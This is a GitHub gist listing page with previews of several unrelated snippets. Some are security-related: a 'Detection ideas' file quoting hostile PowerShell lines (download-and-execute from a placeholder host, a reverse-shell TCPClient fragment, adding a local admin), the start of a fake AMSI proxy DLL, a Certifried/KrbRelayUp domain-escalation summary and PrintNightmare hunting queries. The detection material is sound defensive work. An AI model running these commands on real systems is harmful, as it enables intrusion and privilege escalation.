Skip to content

Instantly share code, notes, and snippets.

View tqz's full-sized avatar

Danne Bag tqz

3 followers · 17 following
View GitHub Profile
@alexgleith
alexgleith / SimpleLoadS2.ipynb
Last active October 17, 2025 07:35
Simplest example for finding and loading Sentinel-2 data using Python
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@atc1441
atc1441 / Philips Sonicare NFC Password generation
Last active August 17, 2025 02:02
#include <stdio.h>
#include <stdint.h>
// Philips Sonicare NFC Head Password calculation by @atc1441 Video manual: https://www.youtube.com/watch?v=EPytrn8i8sc
uint16_t CRC16(uint16_t crc, uint8_t *buffer, int len) // Default CRC16 Algo
{
while(len--)
{
crc ^= *buffer++ << 8;
int bits = 0;
do
@eversinc33
eversinc33 / fakeAmsiDll.cpp
Created June 6, 2023 17:36
// dllmain.cpp : Defines the entry point for the DLL application.
#include "pch.h"
#include <stdio.h>
#include <stdlib.h>
#define _CRT_SECURE_NO_DEPRECATE
#pragma warning (disable : 4996)
// generated with sharpdllproxy.
@tothi
tothi / certifried_with_krbrelayup.md
Last active December 18, 2024 19:47
Certifried combined with KrbRelayUp: non-privileged domain user to Domain Admin without adding/pre-owning computer accounts

Certifried combined with KrbRelayUp

Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged domain user escalating to Domain Admin without the requirement adding/owning computer accounts.

The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.

Prerequisites:

@lhz
lhz / vice-reload.sh
Last active October 9, 2021 08:29
#!/bin/sh
# Reload program and label definitions into a running x64sc session
# Send command to emulator's remote monitor
send () {
echo "$1" | nc -N localhost 6510 >/dev/null
}
# Verify command line parameters
@JohnLaTwC
JohnLaTwC / ideas.txt
Last active January 30, 2023 14:09
Detection ideas
// suspicious PowerShell commands contacting URLs, adding admins, receiving commands
powershell -w 1 -exec bypass -e aQBlAH… --> "iex (("
powershell.exe -c $admins = ([System.Security.Principal.SecurityIdentifier]'S-1-5-32-544').Translate( [System.Security.Principal.NTAccount]).Value;$parts = $admins -split '\';$groupname = $parts[-1];Add-LocalGroupMember -Group $groupname -Member "...
powershell.exe -nop -c "$client = New-Object System.Net.Sockets.TCPClient('.
powershell -exec bypass -C "IEX (New-Object Net.Webclient).downloadstring(\" <ipv4>:<port>\")"
powershell.exe /c Get-WmiObject Win32_ComputerSystemProduct | Select-Object UUID
powershell.exe /c Get-WmiObject Win32_bios | Select-Object SerialNumber
powershell.exe /c Get-WmiObject Win32_PhysicalMedia | Select-Object SerialNumber
C:\Windows\system32\cmd.exe /c powershell -Command "copy \\server\share\procdump.exe C:\dump.exe"
@TallJohnBrown
TallJohnBrown / PrinterNightMare_CrowdStrike.spl
Last active July 9, 2021 00:24
PrinterNightmare Queries
// Based on https://www.reddit.com/r/crowdstrike/comments/oblzcl/20210701_cool_query_friday_printnightmare_poc/
// Query for Registry Mods
event_simpleName=ProcessRollup2
| rename FileName as PE, ImageFileName as PE_Path, TargetProcessId_decimal as ContextProcessId_decimal
| where PE=="spoolsv.exe"
| join ContextProcessId_decimal, aid
[search event_simpleName=AsepValueUpdate (RegObjectName="\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\*\\Data File" OR RegObjectName="\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\*\\Configuration File")]
| lookup local=true aid_master aid OUTPUT Version MachineDomain OU SiteName
| eval ProductType=case(ProductType = "1","Workstation", ProductType = "2","Domain Controller", ProductType = "3","Server")
| where ProductType=="Server" OR ProductType=="Domain Controller"
@jblang
jblang / a_mind_is_born.asm
Created September 6, 2017 20:14
A Mind is Born by Linus Akesson
; A Mind is Born by Linus Akesson
; https://linusakesson.net/scene/a-mind-is-born/index.php
; transcribed to 64tass and further commented by J.B. Langston
; important locations after program is copied to zero page
vmptr = $cb ; video matrix
clock = $13 ; global clock lsb - indicates position within bar
clock_msb = $20 ; global clock msb - indicates bar of song
script = $21 ; poke table
@mikoim
mikoim / README.md
Last active October 2, 2025 02:55
[Updated! Aug 14 2020] YouTube recommended encoding settings on ffmpeg (+ libx264)

Parameters

Container: MP4

Parameter YouTube recommends setting
-movflags faststart moov atom at the front of the file (Fast Start)

Video codec: H.264

@ahendrix
ahendrix / gist:7030300
Created October 17, 2013 18:56
bash stacktrace
function errexit() {
local err=$?
set +o xtrace
local code="${1:-1}"
echo "Error in ${BASH_SOURCE[1]}:${BASH_LINENO[0]}. '${BASH_COMMAND}' exited with status $err"
# Print out the stack trace described by $function_stack
if [ ${#FUNCNAME[@]} -gt 2 ]
then
echo "Call tree:"
for ((i=1;i<${#FUNCNAME[@]}-1;i++))